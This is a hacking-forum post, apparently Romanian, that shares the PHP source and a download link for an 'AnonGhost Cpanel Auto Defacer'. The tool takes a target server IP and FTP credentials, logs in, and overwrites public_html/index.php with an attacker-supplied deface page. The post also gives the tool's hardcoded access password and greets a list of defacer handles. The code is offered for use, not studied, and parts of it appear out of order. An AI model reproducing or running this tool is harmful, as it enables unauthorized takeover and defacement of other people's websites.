Jump to content
albertynos

Cpanel Auto Defacer [SOURCE]

Recommended Posts

Posted (edited)

fso.gif

Cpanel Auto Defacer Acess:

username = team

password = anonghost

:P </font>"; echo "[<a href='" . $_SERVER['PHP_SELF'] . "'>Login</a>]"; exit; } if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || !isset($_SESSION["login"])) { header("WWW-Authenticate: Basic realm=\"username and password move ur ass ^_^\""); header("HTTP/1.0 401 Unauthorized"); $_SESSION["login"] = true; echo "<font color=black size=3 style=comic sans ms>If don't have the logins just go play away °_°</font> "; echo "[<a href='" . $_SERVER['PHP_SELF'] . "'>Login</a>]"; exit; } else { if($_SERVER['PHP_AUTH_USER'] == $username && $_SERVER['PHP_AUTH_PW'] == $password) { echo "<font color=white size=3 style=comic sans ms>welcome Ghost ^_^ </font>"; echo "[<a href='" . $_SERVER['PHP_SELF'] . "?logout'><font color=red size=3 style=comic sans ms>Logout</a>]"; } else { unset($_SESSION["login"]); header("Location: " . $_SERVER['PHP_SELF']); } } $head = ' <html> <head> </script> <title>[[ AnonGhost Cpanel Defacer ]]</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <STYLE> body { font-family: Tahoma } tr { BORDER: dashed 1px #333; color: #FFF; } td { BORDER: dashed 1px #333; color: #FFF; } .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #FFF; } .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 7pt Verdana; color: Green; } .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #FFF; } table { BORDER: dashed 1px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: Black; color: #FFF; } input { border : dashed 1px; border-color : #333; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: Red; } select { BORDER-RIGHT: Black 1px solid; BORDER-TOP: #DF0000 1px solid; BORDER-LEFT: #DF0000 1px solid; BORDER-BOTTOM: Black 1px solid; BORDER-color: #FFF; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: Red; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #FFF; } textarea { border : dashed 1px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; } BODY { SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF margin: 1px; color: Red; background-color: Black; } .main { margin : -287px 0px 0px -490px; BORDER: dashed 1px #333; BORDER-COLOR: #333333; } .tt { background-color: Black; } A:link { COLOR: White; TEXT-DECORATION: none } A:visited { COLOR: White; TEXT-DECORATION: none } A:hover { color: Red; TEXT-DECORATION: none } A:active { color: Red; TEXT-DECORATION: none } </STYLE> <script language=\'javascript\'> function hide_div(id) { document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\'; } function show_div(id) { document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\'; } function change_divst(id) { if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id); } </script>'; ?> <html> <head> <?php echo $head ; echo ' <table width="100%" cellspacing="0" cellpadding="0" class="tb1" > <td width="100%" align=center valign="top" rowspan="1"> <img border="0" src="http://i1210.photobucket.com/albums/cc411/mistersaint/ghost_zpsf0ecf619.png" width="850" height="238"><div class="hedr"> <td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms"size="1"><b> <br><font face="Andalus" size="4" color=#58FAF4>-==[[ Cpanel Auto Defacer Priv8 Coded By Mauritania Attacker. ]]==--</font><br> <br><br> <font color="RED" face="gothic" size="3"></font><br> <font color=white></font> </table> </table><div align=center><font color=#58FAF4 font size=3>Greetz to : </font><font color=RED font size=2><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink"><b>Mauritania Attacker - Virusa Worm - X-Line - SpitFir3 - Ouali Bouziad - Man Sykez - Deto Beiber - crash bandicot - K4C3 Undetected - Sky Lion - Kais Patron - bforcex - MR@T0RJAN</b></span></marquee><br></font></div> '; ?> <body bgcolor=black><h6 style="text-align:center"><font color=white> <p><form method=post> server ip: <input type=text name=hi value=ip> username: <input type=text name=tx value=>   password:<input type=text name=p value=><p> file that you want to deface: <input type=text name=ph value="index.php"> <p><font color=red size=3>Deface page link==> </font><textarea rows=1 cols=50 name=deface value="your daface page link"></textarea> <p><input type=submit name=sm value="Kill it :D" /><br> </form> <?php if(isset($_POST['sm'])) { $ip=trim($_POST['hi']); $u=trim($_POST['tx']); $p=trim($_POST['p']); $d=trim($_POST['ph']); $df=trim($_POST['deface']); echo "<br><font color=white size=2>"; echo "<font color=red size=3>server ip ==></font> ".$ip; echo "<br><font color=red size=3>user ==></font>  ".$u; echo "<br><font color=red size=3>password ==></font>  ".$p; echo "<br><font color=red size=3>dirctory ==></font>  ".$d; echo "<br><font color=red size=3>deface link ==></font><br>".$df."<br>"; $dl="public_html/".$d; $si= ftp_connect($ip); $try= ftp_login($si,$u,$p); if ((!$si) || (!$try)) { echo "<br>could not connected :("; exit; } else { echo "<br>connection done XD<br>Ghost ,its time to spin this shit <img src=http://www.smileyhut.com/dark_green/cool.gif><br>"; } $deface = ftp_put($si, $dl , $df, FTP_BINARY); if ($deface) { echo "hell yesh page got defaced successfully <img src=http://www.smileyhut.com/excited/hyper.gif>"; } else { echo "Ghost try manually :("; } } ?>
<?php   session_start();  $username = "team"; $password = "anonghost";  if(isset($_GET['logout'])) {   unset($_SESSION["login"]);   echo "<font color=black size=3 style=comic sans ms>aa ab rest kerle 

Download :http://www1.datafilehost.com/d/8de6ed7c

Edited by albertynos
Posted
Doar ceva iti spun sinucidete :) Un scan cu fisieru.exe de la download ai:)?

Nu e nici un exe* debifeaza ''Use our download manager and get recommended downloads'' si data viitoare uita-te mai atent.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...